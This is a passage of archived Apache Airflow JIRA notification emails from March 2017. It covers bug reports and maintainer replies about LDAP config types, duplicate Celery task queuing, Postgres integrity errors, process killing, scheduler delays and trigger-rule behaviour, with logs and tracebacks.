> URL: https://issues.apache.org/jira/browse/AIRFLOW-927
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: contrib
>Affects Versions: Airflow 1.8, Airflow 1.7.1.3
>Reporter: Marcelo G. Almiron
> Fix For: 1.8.0
>
>
> Function `get_ldap_connection` on airflow/contrib/auth/backends/ldap_auth.py 
> does not understand 'future.types.newstr.newstr' objects coming from 
> `configuration.get("ldap", "bind_user")` and `configuration.get("ldap", 
> "bind_password")`.
> The same can be observed in the `group_contains_user` function. Here the 
> `search` function does not consider the arguments `configuration.get("ldap", 
> "basedn")`, `configuration.get("ldap", "superuser_filter")`, not 
> `configuration.get("ldap", "user_name_attr")` as expected. 
> A quick fix would be to convert all these values to `str` as soon as they are 
> read from the configuration file, but this is not a definitive fix.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-928) Same {task,execution_date} run multiple times in worker when using CeleryExecutor

2017-03-14 Thread Bolke de Bruin (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-928?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924861#comment-15924861
 ] 

Bolke de Bruin commented on AIRFLOW-928:


[~saguziel] have you seen this?

> Same {task,execution_date} run multiple times in worker when using 
> CeleryExecutor
> -
>
> Key: AIRFLOW-928
> URL: https://issues.apache.org/jira/browse/AIRFLOW-928
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: celery
>Affects Versions: Airflow 1.7.1.3
> Environment: Docker
>Reporter: Uri Shamay
> Attachments: airflow.log, dag_runs.png, dummy_dag.py, processes.list, 
> rabbitmq.queue, scheduler.log, worker_2.log, worker.log
>
>
> Hi,
> When using with Airflow with CeleryExecutor, both RabbitMQ && Redis I tested, 
> I see that when workers are down, the scheduler run each period of time 
> **append** to the same key of {task,execution_date} in the broker, the same 
> {task,execution_date}, what means is that if workers are down/can't connect 
> to broker for few hours, I got in the broker thousands of same executions.
> In my scenario I have just one dummy dag to run with dag_concurrency of 4,
> I expected in that scenario that broker will hold just 4 messages, and the 
> scheduler shouldn't queuing another and another and another for same {task, 
> execution_date}
> What happened is that when workers start to consume messages, they got 
> thousands of tasks for just 4 tasks, and when they trying to write to 
> database for task_instances - there are errors of integrity while such 
> {task,execution_date} already exist.
> Note that in my test after let Airflow to consume works of just one dag 
> without workers for few hours, then I connect to the broker outside by custom 
> client and retrieve the messages - there was thousands of same 
> {dag,execution_date}.
> Even if the case is that there are a lot of dag works on the same key that 
> run just one instance when poll thousands - it's still bad behavior, better 
> to produce one message to the queue, and if some timeout occurred (like 
> visibility), to set the key - and not append to it. 
> What happened is when workers are down for long time and have a lot of jobs 
> that scheduled each minute, when workers come back, they got thousands of 
> same jobs => cause to the worker to run the same dags a lot of times => a lot 
> of wasted python runners => utilized all celery worker threads/processes => 
> starve all other jobs till he understood that need just one instance from all 
> same.
> Attached files:
> 1. airflow.log - this is the task log, you can see that few instances 
> processes of same {task,execution_date} write to the same log file.
> 2. worker.log - this is the worker log, you can see that worker trying to run 
> same {task,execution_date} multiple times + the errors from the database 
> integrity that said that those tasks on those dates already exists.
> 3. scheduler.log to show that scheduler decided to send again and again and 
> again infinitely the same {job,execution_date}
> 4. the dummy_dag.py of the test
> 5. rabbitmq.queue - show that after 5 minutes the broker queue contains 40 
> messages of same 4 {job,execution_date}
> 6. dag_runs.png - show that there are only 4 jobs that need to be run, while 
> there are much more messages in the queue
> 7. processes.list - show that when start worker and doing: ps -ef | grep 
> "airflow run", it show that worker run multiple times same 
> {job,execution_date}
> 8. worker_2.log - show that when worker started - the same 
> {job,execution_date} keys shown multiple times
> Thanks.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-980) IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique constraint "dag_run_dag_id_key" on sample DAGs

2017-03-14 Thread Ruslan Dautkhanov (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-980?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924862#comment-15924862
 ] 

Ruslan Dautkhanov commented on AIRFLOW-980:
---

Thanks for prompt response [~bolke]. I will give it a try and report here. 

> IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique 
> constraint "dag_run_dag_id_key" on sample DAGs
> 
>
> Key: AIRFLOW-980
> URL: https://issues.apache.org/jira/browse/AIRFLOW-980
> Project: Apache Airflow
>  Issue Type: Bug
>Affects Versions: Airflow 1.7.1.3
> Environment: Local Executor
> postgresql+psycopg2 database backend
>Reporter: Ruslan Dautkhanov
>
> Fresh Airflow install using pip.
> Only sample DAGs are installed.
> LocalExecutor (4 workers).
> Most of the parameters are at defaults.
> Turned On all of the sample DAGs (14 of them).
> After some execution (a lot of DAGs had at least one successful execution),
> started seeing below error stack again and again .. In scheduler log.
> {noformat}
> IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique 
> constraint "dag_run_dag_id_key"
>  [SQL: 'INSERT INTO dag_run (dag_id, execution_date, start_date, end_date, 
> state, run_id, external_trigger, conf) VALUES (%(dag_id)s, 
> %(execution_date)s, %(start_date)s, %(end_date)s, %(state)s, %(run_id)s, 
> %(external_trigger)s, %(conf)s) RETURNING dag_run.id'] [parameters: 
> {'end_date': None, 'run_id': u'scheduled__2015-01-01T00:00:00', 
> 'execution_date': datetime.datetime(2015, 1, 1, 0, 0), 'external_trigger': 
> False, 'state': u'running', 'conf': None, 'start_date': 
> datetime.datetime(2017, 3, 14, 11, 12, 29, 646995), 'dag_id': 'example_xcom'}]
> Process Process-152:
> Traceback (most recent call last):
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/multiprocessing/process.py", 
> line 258, in _bootstrap
> self.run()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/multiprocessing/process.py", 
> line 114, in run
> self._target(*self._args, **self._kwargs)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/jobs.py", 
> line 664, in _do_dags
> dag = dagbag.get_dag(dag.dag_id)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/models.py",
>  line 188, in get_dag
> orm_dag = DagModel.get_current(root_dag_id)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/models.py",
>  line 2320, in get_current
> obj = session.query(cls).filter(cls.dag_id == dag_id).first()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2634, in first
> ret = list(self[0:1])
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2457, in __getitem__
> return list(res)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2736, in __iter__
> return self._execute_and_instances(context)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2749, in _execute_and_instances
> close_with_result=True)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2740, in _connection_from_session
> **kw)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 893, in connection
> execution_options=execution_options)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 898, in _connection_for_bind
> engine, execution_options)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 313, in _connection_for_bind
> self._assert_active()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 214, in _assert_active
> % self._rollback_exception
> InvalidRequestError: This Session's transaction has been rolled back due to a 
> previous exception during flush. To begin a new transaction with this 
> Session, first issue Session.rollback(). Original exception was: 
> (psycopg2.IntegrityError) duplicate key value violates unique constraint 
> "dag_run_dag_id_key"
>  [SQL: 'INSERT INTO dag_run (dag_id, execution_date, start_date, end_date, 
> state, run_id, external_trigger, conf) VALUES (%(dag_id)s, 
> %(execution_date)s, %(start_date)s, %(end_date)s, %(state)s, %(run_id)s, 
> %(external_trigger)s, %(conf)s) RETURNING dag_run.id'] [parameters: 
> {'end_date': None, 'run_id': u'scheduled__2015-01-01T00:00:00', 
> 'execution_date': datetime.datetime(2015, 1, 1, 

[jira] [Commented] (AIRFLOW-949) kill_process_tree does not kill the root process

2017-03-14 Thread Bolke de Bruin (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-949?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924840#comment-15924840
 ] 

Bolke de Bruin commented on AIRFLOW-949:


[~saguziel] [~aoen]

> kill_process_tree does not kill the root process
> 
>
> Key: AIRFLOW-949
> URL: https://issues.apache.org/jira/browse/AIRFLOW-949
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: utils
>Affects Versions: 1.8.0rc4
>Reporter: Erik Cederstrand
>  Labels: patch
> Attachments: helpers.patch
>
>
> The kill_process_tree() function in airflow/utils/helper.py does not attempt 
> to kill the root process. Since there's also a kill_descendant_processes() 
> function, I assume that was the intent.
> Also, according to the comments, the intent is to send first SIGTERM, and 
> then SIGKILL, to decendant processes. But in fact, SIGTERM is sent twice.
> The attached patch fixes both problems.
> This was found while investigating why the airflow worker would not kill 
> certain jobs that had crashed. 



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Resolved] (AIRFLOW-934) airflow delayed the task to start

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-934?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-934.

Resolution: Won't Fix

1.6.1. is an unsupported version. Report back if same issue exists on 1.8.0 
(rc5)

> airflow delayed the task to start 
> --
>
> Key: AIRFLOW-934
> URL: https://issues.apache.org/jira/browse/AIRFLOW-934
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: DagRun
>Affects Versions: Airflow 1.6.2
>Reporter: Yajun Dong
>Priority: Blocker
>
> we have a complex DAG which includes many tasks. but recently we found some 
> tasks start delayed. for instance: 
> start_task(which will start at 00:00) --> create_cluster(will finished at 
> 00:11) --> wait_task(start at 00:16) , 
> note: 
> 1. wait_task only has one upstream that is create_cluster 
> 2. the server that the airflow hosts has enough memory, and 
> celeryd_concurrency is 20. 
> below is the log of wait_task: 
> [2017-03-02 00:16:39,602] {models.py:124} INFO - Filling up the DagBag from 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:16:39,603] {models.py:197} INFO - Importing 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:16:39,613] {models.py:284} INFO - Loaded DAG 
> [2017-03-02 00:16:40,333] {models.py:124} INFO - Filling up the DagBag from 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:16:40,333] {models.py:197} INFO - Importing 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:16:40,345] {models.py:284} INFO - Loaded DAG 
> [2017-03-02 00:16:40,373] {models.py:936} INFO - 
> 
> New run starting @2017-03-02T00:16:40.369560
> 
> [2017-03-02 00:16:40,402] {models.py:951} INFO - Queuing into pool None
> [2017-03-02 00:22:31,161] {models.py:124} INFO - Filling up the DagBag from 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:22:31,162] {models.py:197} INFO - Importing 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:22:31,172] {models.py:284} INFO - Loaded DAG 
> [2017-03-02 00:22:31,863] {models.py:124} INFO - Filling up the DagBag from 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:22:31,863] {models.py:197} INFO - Importing 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:22:31,874] {models.py:284} INFO - Loaded DAG 
> [2017-03-02 00:22:31,901] {models.py:936} INFO - 
> 
> New run starting @2017-03-02T00:22:31.897547
> 
> [2017-03-02 00:22:31,911] {models.py:974} INFO - Executing 
>  on 2017-03-01 00:00:00
> [2017-03-02 00:22:31,922] {bash_operator.py:52} INFO - tmp dir root location: 
> /tmp



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-934) airflow delayed the task to start

2017-03-14 Thread Bolke de Bruin (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-934?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924852#comment-15924852
 ] 

Bolke de Bruin commented on AIRFLOW-934:


Try with 1.8.0rc5 - 1.6.1. is not supported anymore.

> airflow delayed the task to start 
> --
>
> Key: AIRFLOW-934
> URL: https://issues.apache.org/jira/browse/AIRFLOW-934
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: DagRun
>Affects Versions: Airflow 1.6.2
>Reporter: Yajun Dong
>Priority: Blocker
>
> we have a complex DAG which includes many tasks. but recently we found some 
> tasks start delayed. for instance: 
> start_task(which will start at 00:00) --> create_cluster(will finished at 
> 00:11) --> wait_task(start at 00:16) , 
> note: 
> 1. wait_task only has one upstream that is create_cluster 
> 2. the server that the airflow hosts has enough memory, and 
> celeryd_concurrency is 20. 
> below is the log of wait_task: 
> [2017-03-02 00:16:39,602] {models.py:124} INFO - Filling up the DagBag from 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:16:39,603] {models.py:197} INFO - Importing 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:16:39,613] {models.py:284} INFO - Loaded DAG 
> [2017-03-02 00:16:40,333] {models.py:124} INFO - Filling up the DagBag from 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:16:40,333] {models.py:197} INFO - Importing 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:16:40,345] {models.py:284} INFO - Loaded DAG 
> [2017-03-02 00:16:40,373] {models.py:936} INFO - 
> 
> New run starting @2017-03-02T00:16:40.369560
> 
> [2017-03-02 00:16:40,402] {models.py:951} INFO - Queuing into pool None
> [2017-03-02 00:22:31,161] {models.py:124} INFO - Filling up the DagBag from 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:22:31,162] {models.py:197} INFO - Importing 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:22:31,172] {models.py:284} INFO - Loaded DAG 
> [2017-03-02 00:22:31,863] {models.py:124} INFO - Filling up the DagBag from 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:22:31,863] {models.py:197} INFO - Importing 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:22:31,874] {models.py:284} INFO - Loaded DAG 
> [2017-03-02 00:22:31,901] {models.py:936} INFO - 
> 
> New run starting @2017-03-02T00:22:31.897547
> 
> [2017-03-02 00:22:31,911] {models.py:974} INFO - Executing 
>  on 2017-03-01 00:00:00
> [2017-03-02 00:22:31,922] {bash_operator.py:52} INFO - tmp dir root location: 
> /tmp



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Closed] (AIRFLOW-937) task_stats makes extremely large prepared query

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-937?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin closed AIRFLOW-937.
--
Resolution: Fixed

> task_stats makes extremely large prepared query
> ---
>
> Key: AIRFLOW-937
> URL: https://issues.apache.org/jira/browse/AIRFLOW-937
> Project: Apache Airflow
>  Issue Type: Improvement
>Reporter: Alex Guziel
>Assignee: Alex Guziel
>
> Right now, the task_stats endpoint makes a few extremely long queries. We can 
> give up some accuracy and get huge speed wins



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Resolved] (AIRFLOW-941) Psycopg2 2.7.0 has a regression when port is 'None'

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-941?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-941.

Resolution: Fixed

> Psycopg2 2.7.0 has a regression when port is 'None'
> ---
>
> Key: AIRFLOW-941
> URL: https://issues.apache.org/jira/browse/AIRFLOW-941
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: operators
>Affects Versions: 1.8.0rc4
>Reporter: Bolke de Bruin
>Assignee: Bolke de Bruin
> Fix For: 1.8.0rc5
>
>
> workaround is to not specify username/password if they are not available. See 
> external issue URL.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Resolved] (AIRFLOW-948) cannot run "airflow initdb"

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-948?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-948.

Resolution: Later

> cannot run "airflow initdb"
> ---
>
> Key: AIRFLOW-948
> URL: https://issues.apache.org/jira/browse/AIRFLOW-948
> Project: Apache Airflow
>  Issue Type: Bug
>Affects Versions: Airflow 1.7.1
> Environment: Debian Jessie 8.2, Python 2.7.9, Python 3.4.2
>Reporter: Tony Kucera
>
> [2017-03-07 08:45:38,241] {__init__.py:36} INFO - Using executor 
> SequentialExecutor
> [2017-03-07 08:45:38,538] {driver.py:120} INFO - Generating grammar tables 
> from /usr/lib/python3.4/lib2to3/Grammar.txt
> [2017-03-07 08:45:38,578] {driver.py:120} INFO - Generating grammar tables 
> from /usr/lib/python3.4/lib2to3/PatternGrammar.txt
> DB: sqlite:root/airflow/airflow.db
> [2017-03-07 08:45:38,898] {db.py:222} INFO - Creating tables
> INFO  [alembic.runtime.migration] Context impl SQLiteImpl.
> INFO  [alembic.runtime.migration] Will assume non-transactional DDL.
> ERROR [airflow.models.DagBag] Failed to import: 
> /usr/local/lib/python3.4/dist-packages/airflow/example_dags/example_twitter_dag.py
> Traceback (most recent call last):
>   File "/usr/local/lib/python3.4/dist-packages/airflow/models.py", line 247, 
> in process_file
> m = imp.load_source(mod_name, filepath)
>   File "/usr/lib/python3.4/imp.py", line 171, in load_source
> module = methods.load()
>   File "", line 1220, in load
>   File "", line 1200, in _load_unlocked
>   File "", line 1129, in _exec
>   File "", line 1471, in exec_module
>   File "", line 321, in _call_with_frames_removed
>   File 
> "/usr/local/lib/python3.4/dist-packages/airflow/example_dags/example_twitter_dag.py",
>  line 26, in 
> from airflow.operators import BashOperator, HiveOperator, PythonOperator
> ImportError: cannot import name 'HiveOperator'



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-948) cannot run "airflow initdb"

2017-03-14 Thread Bolke de Bruin (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-948?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924842#comment-15924842
 ] 

Bolke de Bruin commented on AIRFLOW-948:


pip install airflow[hive]

> cannot run "airflow initdb"
> ---
>
> Key: AIRFLOW-948
> URL: https://issues.apache.org/jira/browse/AIRFLOW-948
> Project: Apache Airflow
>  Issue Type: Bug
>Affects Versions: Airflow 1.7.1
> Environment: Debian Jessie 8.2, Python 2.7.9, Python 3.4.2
>Reporter: Tony Kucera
>
> [2017-03-07 08:45:38,241] {__init__.py:36} INFO - Using executor 
> SequentialExecutor
> [2017-03-07 08:45:38,538] {driver.py:120} INFO - Generating grammar tables 
> from /usr/lib/python3.4/lib2to3/Grammar.txt
> [2017-03-07 08:45:38,578] {driver.py:120} INFO - Generating grammar tables 
> from /usr/lib/python3.4/lib2to3/PatternGrammar.txt
> DB: sqlite:root/airflow/airflow.db
> [2017-03-07 08:45:38,898] {db.py:222} INFO - Creating tables
> INFO  [alembic.runtime.migration] Context impl SQLiteImpl.
> INFO  [alembic.runtime.migration] Will assume non-transactional DDL.
> ERROR [airflow.models.DagBag] Failed to import: 
> /usr/local/lib/python3.4/dist-packages/airflow/example_dags/example_twitter_dag.py
> Traceback (most recent call last):
>   File "/usr/local/lib/python3.4/dist-packages/airflow/models.py", line 247, 
> in process_file
> m = imp.load_source(mod_name, filepath)
>   File "/usr/lib/python3.4/imp.py", line 171, in load_source
> module = methods.load()
>   File "", line 1220, in load
>   File "", line 1200, in _load_unlocked
>   File "", line 1129, in _exec
>   File "", line 1471, in exec_module
>   File "", line 321, in _call_with_frames_removed
>   File 
> "/usr/local/lib/python3.4/dist-packages/airflow/example_dags/example_twitter_dag.py",
>  line 26, in 
> from airflow.operators import BashOperator, HiveOperator, PythonOperator
> ImportError: cannot import name 'HiveOperator'



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-980) IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique constraint "dag_run_dag_id_key" on sample DAGs

2017-03-14 Thread Ruslan Dautkhanov (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-980?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924821#comment-15924821
 ] 

Ruslan Dautkhanov commented on AIRFLOW-980:
---

Thanks [~bolke] How to install 1.8.0rc5 ? Can I do this using pip, or there is 
another way to install a dev version?


> IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique 
> constraint "dag_run_dag_id_key" on sample DAGs
> 
>
> Key: AIRFLOW-980
> URL: https://issues.apache.org/jira/browse/AIRFLOW-980
> Project: Apache Airflow
>  Issue Type: Bug
>Affects Versions: Airflow 1.7.1.3
> Environment: Local Executor
> postgresql+psycopg2 database backend
>Reporter: Ruslan Dautkhanov
>
> Fresh Airflow install using pip.
> Only sample DAGs are installed.
> LocalExecutor (4 workers).
> Most of the parameters are at defaults.
> Turned On all of the sample DAGs (14 of them).
> After some execution (a lot of DAGs had at least one successful execution),
> started seeing below error stack again and again .. In scheduler log.
> {noformat}
> IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique 
> constraint "dag_run_dag_id_key"
>  [SQL: 'INSERT INTO dag_run (dag_id, execution_date, start_date, end_date, 
> state, run_id, external_trigger, conf) VALUES (%(dag_id)s, 
> %(execution_date)s, %(start_date)s, %(end_date)s, %(state)s, %(run_id)s, 
> %(external_trigger)s, %(conf)s) RETURNING dag_run.id'] [parameters: 
> {'end_date': None, 'run_id': u'scheduled__2015-01-01T00:00:00', 
> 'execution_date': datetime.datetime(2015, 1, 1, 0, 0), 'external_trigger': 
> False, 'state': u'running', 'conf': None, 'start_date': 
> datetime.datetime(2017, 3, 14, 11, 12, 29, 646995), 'dag_id': 'example_xcom'}]
> Process Process-152:
> Traceback (most recent call last):
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/multiprocessing/process.py", 
> line 258, in _bootstrap
> self.run()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/multiprocessing/process.py", 
> line 114, in run
> self._target(*self._args, **self._kwargs)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/jobs.py", 
> line 664, in _do_dags
> dag = dagbag.get_dag(dag.dag_id)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/models.py",
>  line 188, in get_dag
> orm_dag = DagModel.get_current(root_dag_id)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/models.py",
>  line 2320, in get_current
> obj = session.query(cls).filter(cls.dag_id == dag_id).first()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2634, in first
> ret = list(self[0:1])
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2457, in __getitem__
> return list(res)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2736, in __iter__
> return self._execute_and_instances(context)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2749, in _execute_and_instances
> close_with_result=True)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2740, in _connection_from_session
> **kw)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 893, in connection
> execution_options=execution_options)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 898, in _connection_for_bind
> engine, execution_options)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 313, in _connection_for_bind
> self._assert_active()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 214, in _assert_active
> % self._rollback_exception
> InvalidRequestError: This Session's transaction has been rolled back due to a 
> previous exception during flush. To begin a new transaction with this 
> Session, first issue Session.rollback(). Original exception was: 
> (psycopg2.IntegrityError) duplicate key value violates unique constraint 
> "dag_run_dag_id_key"
>  [SQL: 'INSERT INTO dag_run (dag_id, execution_date, start_date, end_date, 
> state, run_id, external_trigger, conf) VALUES (%(dag_id)s, 
> %(execution_date)s, %(start_date)s, %(end_date)s, %(state)s, %(run_id)s, 
> %(external_trigger)s, %(conf)s) RETURNING dag_run.id'] [parameters: 
> {'end_date': None, 'run_id': u'scheduled__2015-01-01T00:00:00', 
> 

[jira] [Commented] (AIRFLOW-962) Dag runs are deadlocked for DAG scheduled for @once

2017-03-14 Thread Bolke de Bruin (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-962?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924835#comment-15924835
 ] 

Bolke de Bruin commented on AIRFLOW-962:


please test on 1.8.0 (rc5)

> Dag runs are deadlocked for DAG scheduled for @once
> ---
>
> Key: AIRFLOW-962
> URL: https://issues.apache.org/jira/browse/AIRFLOW-962
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: DagRun
> Environment: airflow v1.7.1.3 installed AWS cluster node
> with celery executor ,rabbitMQ service and mysql for meta store
>Reporter: Sheikh Aslam Ahmed
>
> We read mysql table row from python script and create dags out of it, any 
> change in the row leads to change in the dag.
> we schedule dag based on inputs(like @once,hourly, daily etc).
> From last few days hourly and other scheduled profiles run properly but 
> profile with schedule @once got failed (on web UI no task got picked up from 
> the DAG). the error in the logs shows message as ' {jobs.py:538} ERROR - Dag 
> runs are deadlocked for DAG: dagname'
> after that if we trigger a manual run for same DAG from web UI it run and 
> complete successfully.  



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Resolved] (AIRFLOW-965) ONE_SUCCESS TriggerRule is triggering with only skips

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-965?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-965.

Resolution: Not A Bug

> ONE_SUCCESS TriggerRule is triggering with only skips
> -
>
> Key: AIRFLOW-965
> URL: https://issues.apache.org/jira/browse/AIRFLOW-965
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: cli, DagRun, webserver
>Affects Versions: Airflow 1.8
> Environment: docker-compose using docker-compose-LocalExecutor.yml  
> on this fork/branch 
> https://github.com/fdm1/docker-airflow/tree/v1-8-not-skipping
>Reporter: Daniel Gies
>
> This commit 
> https://git-wip-us.apache.org/repos/asf?p=incubator-airflow.git;a=commitdiff;h=1fdcf24
> Is causing Tasks with the ONE_SUCCESS trigger rule to trigger if any of their 
> upstream dependencies are skipped.
> This changes the previous behavior where ONE_SUCCESS would only fire if there 
> was, you know, a success.
> It is no longer possible to use ONE_SUCCESS as a wait() like mechanism to 
> collect branches of the DAG.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-965) ONE_SUCCESS TriggerRule is triggering with only skips

2017-03-14 Thread Bolke de Bruin (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-965?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924831#comment-15924831
 ] 

Bolke de Bruin commented on AIRFLOW-965:


This is a change in behaviour. (might need to be updated again). Use 
ALL_SUCCESS to have the same behaviour as before.

> ONE_SUCCESS TriggerRule is triggering with only skips
> -
>
> Key: AIRFLOW-965
> URL: https://issues.apache.org/jira/browse/AIRFLOW-965
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: cli, DagRun, webserver
>Affects Versions: Airflow 1.8
> Environment: docker-compose using docker-compose-LocalExecutor.yml  
> on this fork/branch 
> https://github.com/fdm1/docker-airflow/tree/v1-8-not-skipping
>Reporter: Daniel Gies
>
> This commit 
> https://git-wip-us.apache.org/repos/asf?p=incubator-airflow.git;a=commitdiff;h=1fdcf24
> Is causing Tasks with the ONE_SUCCESS trigger rule to trigger if any of their 
> upstream dependencies are skipped.
> This changes the previous behavior where ONE_SUCCESS would only fire if there 
> was, you know, a success.
> It is no longer possible to use ONE_SUCCESS as a wait() like mechanism to 
> collect branches of the DAG.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-972) Airflow kills subprocesses created by task instances

2017-03-14 Thread Bolke de Bruin (JIRA)

[ 
